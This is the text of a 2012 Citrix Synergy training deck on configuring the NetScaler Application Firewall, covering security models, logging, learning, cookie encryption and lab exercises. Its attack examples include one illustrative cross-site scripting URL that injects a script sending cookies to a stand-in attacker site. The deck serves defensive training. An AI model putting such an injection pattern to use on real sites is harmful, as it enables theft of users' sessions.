Protect your data from web-based attacks with NetScaler Application Firewall

Rónán O’BrienSenior Support Readiness

May 2012

2#CitrixSynergy

• Application Firewalls

• Security Models

• Application Firewall Wizard

• Attack Examples

• Learning

• Logging

• Deployment checklist

Agenda

Application Firewalls

4#CitrixSynergy

• Application implies Layer 7

• Not to be confused with Network Firewalls

• Application Firewalls Vs Deep Packet Inspection (DPI)

• SSL Offload

• XML Aware

• Payment Card Industry Data Security Standards (PCI-DSS)

Application Firewalls

5#CitrixSynergy

us-cert.gov

• Some vulnerability and attack reports

can be found on www.us-cert.com

• Operational arm of the National Cyber

Security Division (NCSD) at the

Department of Homeland Security

(DHS).

6#CitrixSynergy

Application Firewall citrix.com site

7#CitrixSynergy

Traffic Flow Architecture

Vserver ASNIP

VIP

Server1 IP

Server2 IP

Server3 IP

Client IP

8#CitrixSynergy

Lab Structure

• Self contained labs – cloud hosted.

• Go to http://training.citrixsynergy.net and enter the course code and your

business e-mail address.

• Course code: SanFran

9#CitrixSynergy

Lab Structure

• Click to open Web Interface,

where you can launch

published XenCenter

• The digital lab guide is here.

• Limited printed copies

available.

LABS 1 & 2

Security Models

12#CitrixSynergy

• Positive Security Model – allow only known good traffic

• Negative Security Model – block only known bad traffic

Security Models

13#CitrixSynergy

Security Models

• NetScaler provides both models

• Positive and Negative use

cases

• Signatures available for

download

• Learning makes positive

security model easier to

configure

14#CitrixSynergy

Application Firewall Actions - Blocking

• Request side block results in:

1. Redirect to root of the website (/) – default.

2. Redirect to a URL of your choice (relative or absolute)

3. Custom error page served from appliance

4. Transform

• Response side block results in:○ Termination of response○ X-Out of sensitive data.

15#CitrixSynergy

Application Firewall Actions - Logging

• Every block action will be logged.

• We can choose not to block, but still

log the violation.

• We can create ‘relaxations’ directly

from the logs.

• Logging is on the appliance, or can be sent to 3rd party.

• Logging is in Syslog format, and as of NetScaler 10 – CEF Format.

16#CitrixSynergy

Application Firewall Actions - Stat

• NetScaler AppFirewall will collect

stats on violations

• Reporting is on the appliance

• Reporting can be performed by 3rd party

also (e.g. Splunk or Citrix Command

Center).

17#CitrixSynergy

Application Firewall Actions - Learn

• NetScaler App Firewall built in

learning intelligence

• Creates Regex rule – so you don’t

have to!

• For scale (when thousands of

learned rules are presented), we use

the Visualizer.

Application Firewall Wizard

19#CitrixSynergy

• Can be used to modify configs previously created by the wizard.

• One stop shop for configuring

Application Firewall.

• Positive and Negative security

models.

• Deep Protections.

• Integrates also with Learning

Application Firewall Wizard

20#CitrixSynergy

Application Firewall Wizard

Lab 3 & 4

Attack Examples

23#CitrixSynergy

• Experienced internet\application users

• Predictable file system layout

• Lack of Web Server security (directory

browsing not disabled

• Reconnaissance

• Site may be used as attack platform (but

otherwise left untouched

Forceful Browsing

24#CitrixSynergy

URL Closure

WWW

<A Href="headline1.htm"><A Href="headline2.htm"><A Href="headline3.htm">

GET headline4.htmHost: newstimes.com

Lab 5

26#CitrixSynergy

SQL Injection

• Uses SQL logic and a vulnerable web form

to extract information from the database.

• Does not impact or violate the web server,

but results in unauthorised access to data.

• Adds an additional SQL command to a

non-validated form field.

27#CitrixSynergy

SQL Injection Custom Actions

• Violation action include allowing the request

continue after neutralising the attack.

• SQL comments can be used to get around

basic string scanning protection.

Lab 6

29#CitrixSynergy

Cross Site Scripting

• Tricking a browser into executing a malicious script.

• Can be dynamic or static.

Customer logs into onlinebank.com

Malicious user sends e-mail to customer with a HTTP link which user clicks on.http://www.onlinebank.com/login.jsp?name=<script>Send cookies to http://piratesite.net</script>

onlinebank.com cookies

Lab 7

31#CitrixSynergy

Application Vulnerability Scans

• Security companies offer an automated scan to test for known vulnerabilities.

• Scanning usually performed on continual basis as○ the application itself is changed\developed○ New attack methods & vulnerabilities are discovered.

• NetScaler Application Firewall understands the scan report & suggest the

necessary protections to close the security holes.

Lab 8

33#CitrixSynergy

Form Field Consistency

• Attack method: Client-side modification of form properties.

• Vulnerability: Client Input not validated.

• Result: Compromise of application logic.

• Hidden form elements (e.g. prices)

• Form structure – e.g. radio buttons, check boxes etc.

Lab 9

35#CitrixSynergy

Protecting Application Cookies

• Cookies are Web Application\Web Server identity tokens.

• Session vs Persistent

• Name value configuration

• Application Firewall Cookie ‘proactive’ Actions include

encrypting and proxying cookies (next).

• If cookie is tampered with, action is to block.

36#CitrixSynergy

Cookie Encryption & Decryption

Set-Cookie: user=bobSet-Cookie: user = KLJDG84NMRG

Cookie: user = KLJDG84NMRG Cookie: user=bob

37#CitrixSynergy

Cookie Proxying

Set-Cookie: user=bobSet-Cookie: access=limited

Set-Cookie: AppfwCookieJar=H77HFDSH908

Cookie: AppfwCookieJar=H77HFDSH908 Cookie: user=bobCookie: access=limited

Lab 10

Learning

40#CitrixSynergy

Learning

Learned data

• is used to create rules for the positive security model.

• can be exported to a CSV for analysis.

• is propagated in a HA pair of appliances.

• is stored in RegEx format.

• should not be left permanently turned on in production.

Lab 11

42#CitrixSynergy

HTML Comment Stripping

• Programming Comments

<!--This is a comment. Comments are not displayed in the browser

But may contain all sorts of temporary information -->

• Some scripts include comments:

<script type="text/javascript">

<!-- function displayMsg() {

alert("Hello World!") } //--> </script>

Lab 12

Deployment points to bear in mind

45#CitrixSynergy

• Sizing – look at the web application logs & response sizes.

• Decide which parts of the application need to be protected, and if it requires

different levels of protection.

• Some protections are more resource intensive than others

• Clever usage of policies and ACLs can allow only specific groups

access to the application to fill the learning DB with valid traffic patterns.

Before Turning on Application Firewall

#CitrixSynergy

Before you leave…

• Conference surveys are available online at www.citrixsummit.com starting Thursday, May 10○ Provide your feedback and pick up a complimentary gift at the registration desk

• Download presentations starting Monday, May 21, from your My Organizer tool located in your My Account

#CitrixSynergy

We value your feedback!Take a survey of this session now in the mobile app

• Click 'Sessions' button

• Click on today's tab

• Find this session

• Click 'Surveys'